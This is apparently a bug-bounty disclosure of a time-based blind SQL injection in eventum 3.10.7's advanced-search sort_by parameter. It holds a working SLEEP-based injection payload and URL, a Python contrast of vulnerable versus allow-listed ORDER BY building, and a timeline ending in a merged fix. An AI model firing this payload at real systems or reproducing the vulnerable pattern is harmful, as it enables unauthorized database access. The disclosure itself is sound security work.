SQL Injection in eventum/eventum

Status: Valid

Reported on: Oct 27th 2021


Description

Time-Based Blind SQL Injection in eventum 3.10.7

Proof of Concept

// PoC.payload

// Advanced Search
// Parameter: sort_by
priority[0]=0&severity[0]=0&users[0]=0&category[0]=0&status[0]=0&release[0]=0&rows=5&sort_by=pri_rank AND (SELECT 2168 FROM (SELECT(SLEEP(5)))UNFg)&sort_order=ASC&hide_closed=1&show_authorized_issues=&show_notification_list_issues=&search_type=all_text&reporter[0]=0&customer_id=&product[0]=0&custom_field=&nosave=
// PoC.url

// Advanced Search 
http://[DOMAIN]/list.php?priority[0]=0&severity[0]=0&users[0]=0&category[0]=0&status[0]=0&release[0]=0&rows=5&sort_by=pri_rank%20AND%20(SELECT%202168%20FROM%20(SELECT(SLEEP(5)))UNFg)&sort_order=ASC&hide_closed=1&show_authorized_issues=&show_notification_list_issues=&search_type=all_text&reporter[0]=0&customer_id=&product[0]=0&custom_field=&nosave=
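The payload above lands in the ORDER BY clause, where bound parameters cannot be used for column names, so the fix for this class of bug is an allow-list of sort columns and directions. The following is an added illustration, not eventum's code or the merged fix: a Python/sqlite3 model of the vulnerable concatenation beside a hardened version. The table and column names other than pri_rank are hypothetical.

```python
import sqlite3

# Allow-list from the user-facing sort_by value to a real column name.
# Only "pri_rank" comes from the report; the other names are hypothetical.
SORT_COLUMNS = {
    "pri_rank": "pri_rank",
    "iss_id": "iss_id",
    "iss_summary": "iss_summary",
}
SORT_ORDERS = {"ASC", "DESC"}

# The sort_by value from the PoC URL, decoded (constructed from the report).
POC_SORT_BY = "pri_rank AND (SELECT 2168 FROM (SELECT(SLEEP(5)))UNFg)"


def build_query_vulnerable(sort_by: str, sort_order: str) -> str:
    """Vulnerable pattern: the request parameter is pasted into ORDER BY."""
    return f"SELECT iss_id, iss_summary FROM issue ORDER BY {sort_by} {sort_order}"


def build_query_hardened(sort_by: str, sort_order: str) -> str:
    """Hardened pattern: only allow-listed identifiers ever reach the SQL text."""
    column = SORT_COLUMNS.get(sort_by)
    if column is None:
        raise ValueError(f"unsupported sort_by: {sort_by!r}")
    order = sort_order.upper()
    if order not in SORT_ORDERS:
        raise ValueError(f"unsupported sort_order: {sort_order!r}")
    return f"SELECT iss_id, iss_summary FROM issue ORDER BY {column} {order}"


def accepts(sort_by: str, sort_order: str) -> bool:
    """True if the hardened builder accepts this sort_by/sort_order pair."""
    try:
        build_query_hardened(sort_by, sort_order)
        return True
    except ValueError:
        return False


def run_sorted(sort_by: str, sort_order: str) -> list:
    """Run the hardened query against a constructed in-memory table; returns iss_id order."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE issue (iss_id INTEGER, iss_summary TEXT, pri_rank INTEGER)")
    conn.executemany("INSERT INTO issue VALUES (?, ?, ?)",
                     [(1, "first", 3), (2, "second", 1), (3, "third", 2)])
    return [row[0] for row in conn.execute(build_query_hardened(sort_by, sort_order))]
```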

Impact

A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

References

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a month ago)
We have opened a pull request with a SECURITY.md for eventum to merge. (a month ago)
lethanhphuc modified their report (a month ago)
lethanhphuc modified their report (a month ago)
We have contacted a member of the eventum team and are waiting to hear back (a month ago)
We have sent a follow up to the eventum team. We will try again in 7 days. (a month ago)
We have sent a second follow up to the eventum team. We will try again in 10 days. (25 days ago)
lethanhphuc
22 days ago

Researcher


@maintainer Can you validate the report?

lethanhphuc modified their report (22 days ago)
lethanhphuc submitted a (22 days ago)
eventum/eventum maintainer validated this vulnerability (22 days ago)
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
eventum/eventum maintainer
22 days ago

Maintainer


The bug is valid, but the fix in this PR is broken and incomplete:

  • https://github.com/eventum/eventum/pull/1252
eventum/eventum maintainer
22 days ago

Maintainer


Better and tested fix was submitted:

  • https://github.com/eventum/eventum/pull/1255
eventum/eventum maintainer confirmed that a fix has been merged on 15f749 (22 days ago)
lethanhphuc has been awarded the fix bounty